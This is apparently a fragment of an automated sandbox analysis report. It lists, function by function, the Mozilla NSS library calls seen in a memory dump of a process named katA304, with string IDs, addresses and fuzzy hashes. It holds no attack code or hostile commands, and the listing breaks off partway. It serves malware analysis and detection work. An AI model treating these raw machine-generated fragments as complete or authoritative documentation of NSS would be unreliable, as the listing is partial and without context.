                                                            • Instruction ID: a7e734d9c144b641592b81f0d5ef5501b2bc49b0f275df0e0d7ead42c2f81d0c
                                                            • Opcode Fuzzy Hash: 19f3206cb8d57b82d96000265fa36f2af6343ef1e3be74cde65a6f7ad20a60d7
                                                            • Instruction Fuzzy Hash: FA41E4356010A4AFEB01DF55ED59EAA3BB5BB42358F085024F80DD7B51DB34D89CCB92
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_LoginUser), ref: 6CA39C66
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA39C94
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA39CA3
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA39CB9
                                                            • PR_LogPrint.NSS3( userType = 0x%x,?), ref: 6CA39CDA
                                                            • PR_LogPrint.NSS3( pPin = 0x%p,?), ref: 6CA39CF5
                                                            • PR_LogPrint.NSS3( ulPinLen = %d,?), ref: 6CA39D10
                                                            • PR_LogPrint.NSS3( pUsername = 0x%p,?), ref: 6CA39D29
                                                            • PR_LogPrint.NSS3( ulUsernameLen = %d,?), ref: 6CA39D42
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                            • String ID: hSession = 0x%x$ pPin = 0x%p$ pUsername = 0x%p$ ulPinLen = %d$ ulUsernameLen = %d$ userType = 0x%x$ (CK_INVALID_HANDLE)$C_LoginUser
                                                            • API String ID: 1003633598-3838449515
                                                            • Opcode ID: c9394997eadabcae94c02ab33ebebe443c60b2b259378da4f83555bf8cc91315
                                                            • Instruction ID: 66236855c742f349738f7f98e78fd121451f638c35a7a7fad91be04c87a80b51
                                                            • Opcode Fuzzy Hash: c9394997eadabcae94c02ab33ebebe443c60b2b259378da4f83555bf8cc91315
                                                            • Instruction Fuzzy Hash: B84117356010A4AFEB01CF65EE59EAE3BB5AB4235DF485014F80DEBA51DF34C858CB92
                                                            APIs
                                                            • calloc.MOZGLUE(00000001,00000080), ref: 6CB19C70
                                                            • PR_NewLock.NSS3 ref: 6CB19C85
                                                              • Part of subcall function 6CAC98D0: calloc.MOZGLUE(00000001,00000084,6C9F0936,00000001,?,6C9F102C), ref: 6CAC98E5
                                                            • PR_NewCondVar.NSS3(00000000), ref: 6CB19C96
                                                              • Part of subcall function 6C9EBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C9F21BC), ref: 6C9EBB8C
                                                            • PR_NewLock.NSS3 ref: 6CB19CA9
                                                              • Part of subcall function 6CAC98D0: InitializeCriticalSectionAndSpinCount.KERNEL32(0000001C,000005DC), ref: 6CAC9946
                                                              • Part of subcall function 6CAC98D0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C9816B7,00000000), ref: 6CAC994E
                                                              • Part of subcall function 6CAC98D0: free.MOZGLUE(00000000), ref: 6CAC995E
                                                            • PR_NewLock.NSS3 ref: 6CB19CB9
                                                            • PR_NewLock.NSS3 ref: 6CB19CC9
                                                            • PR_NewCondVar.NSS3(00000000), ref: 6CB19CDA
                                                              • Part of subcall function 6C9EBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C9EBBEB
                                                              • Part of subcall function 6C9EBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C9EBBFB
                                                              • Part of subcall function 6C9EBB80: GetLastError.KERNEL32 ref: 6C9EBC03
                                                              • Part of subcall function 6C9EBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C9EBC19
                                                              • Part of subcall function 6C9EBB80: free.MOZGLUE(00000000), ref: 6C9EBC22
                                                            • PR_NewCondVar.NSS3(?), ref: 6CB19CF0
                                                            • PR_NewPollableEvent.NSS3 ref: 6CB19D03
                                                              • Part of subcall function 6CB0F3B0: PR_CallOnce.NSS3(6CB614B0,6CB0F510), ref: 6CB0F3E6
                                                              • Part of subcall function 6CB0F3B0: PR_CreateIOLayerStub.NSS3(6CB6006C), ref: 6CB0F402
                                                              • Part of subcall function 6CB0F3B0: PR_Malloc.NSS3(00000004), ref: 6CB0F416
                                                              • Part of subcall function 6CB0F3B0: PR_NewTCPSocketPair.NSS3(?), ref: 6CB0F42D
                                                              • Part of subcall function 6CB0F3B0: PR_SetSocketOption.NSS3(?), ref: 6CB0F455
                                                              • Part of subcall function 6CB0F3B0: PR_PushIOLayer.NSS3(?,000000FE,00000000), ref: 6CB0F473
                                                              • Part of subcall function 6CAC9890: TlsGetValue.KERNEL32(?,?,?,6CAC97EB), ref: 6CAC989E
                                                            • EnterCriticalSection.KERNEL32(?), ref: 6CB19D78
                                                            • calloc.MOZGLUE(00000001,0000000C), ref: 6CB19DAF
                                                            • _PR_CreateThread.NSS3(00000000,6CB19EA0,00000000,00000001,00000001,00000000,?,00000000), ref: 6CB19D9F
                                                              • Part of subcall function 6C9EB3C0: TlsGetValue.KERNEL32 ref: 6C9EB403
                                                              • Part of subcall function 6C9EB3C0: _PR_NativeCreateThread.NSS3(?,?,?,?,?,?,?,?), ref: 6C9EB459
                                                            • _PR_CreateThread.NSS3(00000000,6CB1A060,00000000,00000001,00000001,00000000,?,00000000), ref: 6CB19DE8
                                                            • calloc.MOZGLUE(00000001,0000000C), ref: 6CB19DFC
                                                            • _PR_CreateThread.NSS3(00000000,6CB1A530,00000000,00000001,00000001,00000000,?,00000000), ref: 6CB19E29
                                                            • calloc.MOZGLUE(00000001,0000000C), ref: 6CB19E3D
                                                            • _PR_MD_UNLOCK.NSS3(?), ref: 6CB19E71
                                                            • PR_SetError.NSS3(FFFFE890,00000000), ref: 6CB19E89
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: calloc$CreateError$LockThread$CondCriticalSection$CountInitializeLastLayerSocketSpinValuefree$CallEnterEventMallocNativeOnceOptionPairPollablePushStub
                                                            • String ID:
                                                            • API String ID: 4254102231-0
                                                            • Opcode ID: 344be48aa9c992ac0ed6650e212f2a5123d8a730f097e377ef96a9e41603f521
                                                            • Instruction ID: 682f2b41cdaf8804c778ba7a89169e06f94f738252292f9e994def727b63237c
                                                            • Opcode Fuzzy Hash: 344be48aa9c992ac0ed6650e212f2a5123d8a730f097e377ef96a9e41603f521
                                                            • Instruction Fuzzy Hash: AE612BB2E00746AFD715DF75C884AA7BBF8FF08208B044529E859C7B11E730E858CBA5
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_GetObjectSize), ref: 6CA34CF3
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA34D28
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA34D37
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA34D4D
                                                            • PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6CA34D7B
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA34D8A
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA34DA0
                                                            • PR_LogPrint.NSS3( pulSize = 0x%p,?), ref: 6CA34DBC
                                                            • PR_LogPrint.NSS3( *pulSize = 0x%x,?), ref: 6CA34E20
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                            • String ID: *pulSize = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pulSize = 0x%p$ (CK_INVALID_HANDLE)$C_GetObjectSize
                                                            • API String ID: 1003633598-3553622718
                                                            • Opcode ID: 0e6cbb9e502b584c741f1b7ba4a8dedc4c0d5ce763cf841bca792c55d9fc1283
                                                            • Instruction ID: 8d4d9c780b98f9f7742dd8bbd3a357d097a146e5aacaf475d46899ff73cb4295
                                                            • Opcode Fuzzy Hash: 0e6cbb9e502b584c741f1b7ba4a8dedc4c0d5ce763cf841bca792c55d9fc1283
                                                            • Instruction Fuzzy Hash: E5413735604160AFEB028F14ED98F7E7BB9EB4239DF084024F40CEBA51DB358898CB52
                                                            APIs
                                                            • PR_LogPrint.NSS3(C_Verify), ref: 6CA37CB6
                                                            • PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6CA37CE4
                                                            • PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6CA37CF3
                                                              • Part of subcall function 6CB1D930: PL_strncpyz.NSS3(?,?,?), ref: 6CB1D963
                                                            • PR_LogPrint.NSS3(?,00000000), ref: 6CA37D09
                                                            • PR_LogPrint.NSS3( pData = 0x%p,?), ref: 6CA37D2A
                                                            • PR_LogPrint.NSS3( ulDataLen = %d,?), ref: 6CA37D45
                                                            • PR_LogPrint.NSS3( pSignature = 0x%p,?), ref: 6CA37D5E
                                                            • PR_LogPrint.NSS3( ulSignatureLen = %d,?), ref: 6CA37D77
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Print$L_strncpyz$L_strcatn
                                                            • String ID: hSession = 0x%x$ pData = 0x%p$ pSignature = 0x%p$ ulDataLen = %d$ ulSignatureLen = %d$ (CK_INVALID_HANDLE)$C_Verify
                                                            • API String ID: 1003633598-3278097884
                                                            • Opcode ID: 98a7fc0b72230133d98515b45b9b437af5aa7b7e883a2f6cd1c3eee92e11c8cc
                                                            • Instruction ID: 937de58a3ff4f5ba43e035dd39f68e9ceec9a3da6403e2850f6f7aaec9ec28f4
                                                            • Opcode Fuzzy Hash: 98a7fc0b72230133d98515b45b9b437af5aa7b7e883a2f6cd1c3eee92e11c8cc
                                                            • Instruction Fuzzy Hash: 4D31F535601194EFEB01CF65EE58F7A37B5AB42398F485024F40DDBA51DB348898CBA2
                                                            APIs
                                                            • PR_LoadLibrary.NSS3(ws2_32.dll,?,?,?,6CACCC7B), ref: 6CACCD7A
                                                              • Part of subcall function 6CACCE60: PR_LoadLibraryWithFlags.NSS3(?,?,?,?,00000000,?,6CA3C1A8,?), ref: 6CACCE92
                                                            • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CACCDA5
                                                            • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CACCDB8
                                                            • PR_UnloadLibrary.NSS3(00000000), ref: 6CACCDDB
                                                            • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CACCD8E
                                                              • Part of subcall function 6C9F05C0: PR_EnterMonitor.NSS3 ref: 6C9F05D1
                                                              • Part of subcall function 6C9F05C0: PR_ExitMonitor.NSS3 ref: 6C9F05EA
                                                            • PR_LoadLibrary.NSS3(wship6.dll), ref: 6CACCDE8
                                                            • PR_FindSymbol.NSS3(00000000,getaddrinfo), ref: 6CACCDFF
                                                            • PR_FindSymbol.NSS3(00000000,freeaddrinfo), ref: 6CACCE16
                                                            • PR_FindSymbol.NSS3(00000000,getnameinfo), ref: 6CACCE29
                                                            • PR_UnloadLibrary.NSS3(00000000), ref: 6CACCE48
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: FindSymbol$Library$Load$MonitorUnload$EnterExitFlagsWith
                                                            • String ID: freeaddrinfo$getaddrinfo$getnameinfo$ws2_32.dll$wship6.dll
                                                            • API String ID: 601260978-871931242
                                                            • Opcode ID: ddd4d501174a27e34a023c62adc699f741ca0dfab719cc94f86bd2d95e656175
                                                            • Instruction ID: bfc3d5de411543c729fbc4672383f796ddc73c7d0fc63dea409665d6ea03497e
                                                            • Opcode Fuzzy Hash: ddd4d501174a27e34a023c62adc699f741ca0dfab719cc94f86bd2d95e656175
                                                            • Instruction Fuzzy Hash: 4111D6ADF0256156EB02AA776C00AAA386C5B2321DF1C5535EC19D6F40FB20C58A87F3
                                                            APIs
                                                            • calloc.MOZGLUE(00000001,00000040,?,?,?,?,?,6CB113BC,?,?,?,6CB11193), ref: 6CB11C6B
                                                            • PR_NewLock.NSS3(?,6CB11193), ref: 6CB11C7E
                                                              • Part of subcall function 6CAC98D0: calloc.MOZGLUE(00000001,00000084,6C9F0936,00000001,?,6C9F102C), ref: 6CAC98E5
                                                            • PR_NewCondVar.NSS3(00000000,?,6CB11193), ref: 6CB11C91
                                                              • Part of subcall function 6C9EBB80: calloc.MOZGLUE(00000001,00000084,00000000,00000040,?,6C9F21BC), ref: 6C9EBB8C
                                                            • PR_NewCondVar.NSS3(00000000,?,?,6CB11193), ref: 6CB11CA7
                                                              • Part of subcall function 6C9EBB80: PR_SetError.NSS3(FFFFE890,00000000), ref: 6C9EBBEB
                                                              • Part of subcall function 6C9EBB80: InitializeCriticalSectionAndSpinCount.KERNEL32(0000000C,000005DC), ref: 6C9EBBFB
                                                              • Part of subcall function 6C9EBB80: GetLastError.KERNEL32 ref: 6C9EBC03
                                                              • Part of subcall function 6C9EBB80: PR_SetError.NSS3(FFFFE8AA,00000000), ref: 6C9EBC19
                                                              • Part of subcall function 6C9EBB80: free.MOZGLUE(00000000), ref: 6C9EBC22
                                                            • PR_NewCondVar.NSS3(00000000,?,?,?,6CB11193), ref: 6CB11CBE
                                                            • PR_NewCondVar.NSS3(00000000,?,?,?,?,6CB11193), ref: 6CB11CD4
                                                            • calloc.MOZGLUE(00000001,000000F4,?,?,?,?,?,6CB11193), ref: 6CB11CFE
                                                            • PR_Lock.NSS3(?,?,?,?,?,?,?,6CB11193), ref: 6CB11D1A
                                                              • Part of subcall function 6CAC9BA0: TlsGetValue.KERNEL32(00000000,00000000,?,6C9F1A48), ref: 6CAC9BB3
                                                              • Part of subcall function 6CAC9BA0: EnterCriticalSection.KERNEL32(?,?,?,?,6C9F1A48), ref: 6CAC9BC8
                                                            • PR_Unlock.NSS3(?,?,?,?,?,?,?,?,6CB11193), ref: 6CB11D3D
                                                              • Part of subcall function 6CAADD70: TlsGetValue.KERNEL32 ref: 6CAADD8C
                                                              • Part of subcall function 6CAADD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6CAADDB4
                                                            • PR_SetError.NSS3(FFFFE890,00000000,?,6CB11193), ref: 6CB11D4E
                                                            • PR_SetError.NSS3(FFFFE890,00000000,?,?,?,?,?,?,?,6CB11193), ref: 6CB11D64
                                                            • PR_DestroyCondVar.NSS3(?,?,?,?,?,?,?,?,?,?,6CB11193), ref: 6CB11D6F
                                                            • PR_DestroyCondVar.NSS3(00000000,?,?,?,?,?,6CB11193), ref: 6CB11D7B
                                                            • PR_DestroyCondVar.NSS3(?,?,?,?,?,6CB11193), ref: 6CB11D87
                                                            • PR_DestroyCondVar.NSS3(00000000,?,?,?,6CB11193), ref: 6CB11D93
                                                            • PR_DestroyLock.NSS3(00000000,?,?,6CB11193), ref: 6CB11D9F
                                                            • free.MOZGLUE(00000000,?,6CB11193), ref: 6CB11DA8
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: Cond$DestroyError$calloc$CriticalLockSection$Valuefree$CountEnterInitializeLastLeaveSpinUnlock
                                                            • String ID:
                                                            • API String ID: 3246495057-0
                                                            • Opcode ID: f9f4ba83c771375d7cf0ac17ae4cf7c10855b2c38695a4f1bacf874b9b1d259a
                                                            • Instruction ID: b45ab1a20ff9c0928b583bf97b62baef0a38df530526ff019f6c68d240eb398a
                                                            • Opcode Fuzzy Hash: f9f4ba83c771375d7cf0ac17ae4cf7c10855b2c38695a4f1bacf874b9b1d259a
                                                            • Instruction Fuzzy Hash: 8531D7F5E007115FEB119F65AC41AA77AF4AF2560CB084438E84A87F41FB31E408CBA3
                                                            APIs
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,multiaccess:,0000000C,?,00000000,?,?,6CA65EC0,00000000,?,?), ref: 6CA65CBE
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,sql:,00000004,?,?,?), ref: 6CA65CD7
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,extern:,00000007), ref: 6CA65CF0
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(?,dbm:,00000004), ref: 6CA65D09
                                                            • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE,?,00000000,?,?,6CA65EC0,00000000,?,?), ref: 6CA65D1F
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000003,?), ref: 6CA65D3C
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000006,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA65D51
                                                            • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000003,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA65D66
                                                            • PORT_Strdup_Util.NSS3(?,?,?,?), ref: 6CA65D80
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: strncmp$SecureStrdup_Util
                                                            • String ID: NSS_DEFAULT_DB_TYPE$dbm:$extern:$multiaccess:$sql:
                                                            • API String ID: 1171493939-3017051476
                                                            • Opcode ID: 36abd1f7bd99d880dfda191d0ef9fb19ead5824221792d8bbdf52a29c38bd94a
                                                            • Instruction ID: 9c7f24d54e10a01264a6e9b2ce5e47d6b5cf2b00f1b6795b9bb948ce96f25874
                                                            • Opcode Fuzzy Hash: 36abd1f7bd99d880dfda191d0ef9fb19ead5824221792d8bbdf52a29c38bd94a
                                                            • Instruction Fuzzy Hash: 3331F4F4B41381ABFB029E26CC48B663769AF1225CF280430EE55A7EC3E7B1E555C295
                                                            APIs
                                                            • SEC_ASN1DecodeItem_Util.NSS3(?,?,6CB31DE0,?), ref: 6CA66CFE
                                                            • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CA66D26
                                                            • PR_SetError.NSS3(FFFFE04F,00000000), ref: 6CA66D70
                                                            • PORT_Alloc_Util.NSS3(00000480), ref: 6CA66D82
                                                            • DER_GetInteger_Util.NSS3(?), ref: 6CA66DA2
                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA66DD8
                                                            • PK11_KeyGen.NSS3(00000000,8000000B,?,00000000,00000000), ref: 6CA66E60
                                                            • PK11_CreateContextBySymKey.NSS3(00000201,00000108,?,?), ref: 6CA66F19
                                                            • PK11_DigestBegin.NSS3(00000000), ref: 6CA66F2D
                                                            • PK11_DigestOp.NSS3(?,?,00000000), ref: 6CA66F7B
                                                            • PK11_DestroyContext.NSS3(00000000,00000001), ref: 6CA67011
                                                            • PK11_FreeSymKey.NSS3(00000000), ref: 6CA67033
                                                            • free.MOZGLUE(?), ref: 6CA6703F
                                                            • PK11_DigestFinal.NSS3(?,?,?,00000400), ref: 6CA67060
                                                            • SECITEM_CompareItem_Util.NSS3(?,?), ref: 6CA67087
                                                            • PR_SetError.NSS3(FFFFE062,00000000), ref: 6CA670AF
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: K11_$Util$DigestError$ContextItem_$AlgorithmAlloc_BeginCompareCreateDecodeDestroyFinalFreeInteger_Tag_free
                                                            • String ID:
                                                            • API String ID: 2108637330-0
                                                            • Opcode ID: 43e48eb70c05c4f56932a244eeedab354efeb275b93afeabf11dee2e19d515b0
                                                            • Instruction ID: 2f8e9a5352d6e89fb86baa7533610873fa0f00ac0e63aa1a5ef68f1ad2a69430
                                                            • Opcode Fuzzy Hash: 43e48eb70c05c4f56932a244eeedab354efeb275b93afeabf11dee2e19d515b0
                                                            • Instruction Fuzzy Hash: 3DA129719182009BEB009F26DD55B6B32A5DB8130CF288939E968CBF81E775D8D9C793
                                                            APIs
                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA7ADB1
                                                              • Part of subcall function 6CA5BE30: SECOID_FindOID_Util.NSS3(6CA1311B,00000000,?,6CA1311B,?), ref: 6CA5BE44
                                                            • PL_InitArenaPool.NSS3(?,security,00000800,00000008), ref: 6CA7ADF4
                                                            • SEC_QuickDERDecodeItem_Util.NSS3(?,?,?,?), ref: 6CA7AE08
                                                              • Part of subcall function 6CA5B030: PR_SetError.NSS3(FFFFE005,00000000,?,?,6CB318D0,?), ref: 6CA5B095
                                                            • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6CA7AE25
                                                            • PL_FreeArenaPool.NSS3 ref: 6CA7AE63
                                                            • PR_CallOnce.NSS3(6CB62AA4,6CA612D0), ref: 6CA7AE4D
                                                              • Part of subcall function 6C984C70: TlsGetValue.KERNEL32(?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984C97
                                                              • Part of subcall function 6C984C70: EnterCriticalSection.KERNEL32(?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984CB0
                                                              • Part of subcall function 6C984C70: PR_Unlock.NSS3(?,?,?,?,?,6C983921,6CB614E4,6CACCC70), ref: 6C984CC9
                                                            • SECKEY_DestroyPublicKey.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA7AE93
                                                            • PR_CallOnce.NSS3(6CB62AA4,6CA612D0), ref: 6CA7AECC
                                                            • PL_FreeArenaPool.NSS3 ref: 6CA7AEDE
                                                            • PL_FinishArenaPool.NSS3 ref: 6CA7AEE6
                                                            • PR_SetError.NSS3(FFFFD004,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6CA7AEF5
                                                            • PL_FinishArenaPool.NSS3 ref: 6CA7AF16
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 0000000D.00000002.3147358009.000000006C981000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6C980000, based on PE: true
                                                            • Associated: 0000000D.00000002.3147286812.000000006C980000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149018204.000000006CB1F000.00000002.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149391307.000000006CB5E000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149492568.000000006CB5F000.00000008.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149528603.000000006CB60000.00000004.00000001.01000000.0000000C.sdmp
                                                            • Associated: 0000000D.00000002.3149594901.000000006CB65000.00000002.00000001.01000000.0000000C.sdmp
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_13_2_6c980000_katA304.jbxd
                                                            Similarity
                                                            • API ID: ArenaPool$Util$AlgorithmCallErrorFinishFreeOnceTag_$CriticalDecodeDestroyEnterFindInitItem_PublicQuickSectionUnlockValue
                                                            • String ID: security
                                                            • API String ID: 3441714441-3315324353
                                                            • Opcode ID: 347d1bdef61c0bc1e0d2312c9254d7b5146859520e0a79b4d158ff3c470bb91b
                                                            • Instruction ID: 280bf3f71b4b6792a3ae293951e5bc1e9bc722111252a09007ea159eeb2a5b67
                                                            • Opcode Fuzzy Hash: 347d1bdef61c0bc1e0d2312c9254d7b5146859520e0a79b4d158ff3c470bb91b
                                                            • Instruction Fuzzy Hash: 6F4115BA904220B6F7314B25DD44BAA32B9BF4221DF180525E81492F81EB35DDD886F3
                                                            APIs
                                                              • Part of subcall function 6CA92BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CA92A28,00000060,00000001), ref: 6CA92BF0
                                                              • Part of subcall function 6CA92BE0: CERT_DestroyCertificate.NSS3(?,00000000,00000000,?,6CA92A28,00000060,00000001), ref: 6CA92C07
                                                              • Part of subcall function 6CA92BE0: SECKEY_DestroyPublicKey.NSS3(?,00000000,00000000,?,6CA92A28,00000060,00000001), ref: 6CA92C1E
                                                              • Part of subcall function 6CA92BE0: free.MOZGLUE(?,00000000,00000000,?,6CA92A28,00000060,00000001), ref: 6CA92C4A
                                                            • free.MOZGLUE(?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000,?,6CA980C1), ref: 6CA95D0F
                                                            • free.MOZGLUE(?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000,?,6CA980C1), ref: 6CA95D4E
                                                            • free.MOZGLUE(?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000,?,6CA980C1), ref: 6CA95D62
                                                            • free.MOZGLUE(?,?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000,?,6CA980C1), ref: 6CA95D85
                                                            • free.MOZGLUE(?,?,?,?,6CA9AAD4,?,?,?,?,?,?,?,?,00000000,?,6CA980C1), ref: 6CA95D99
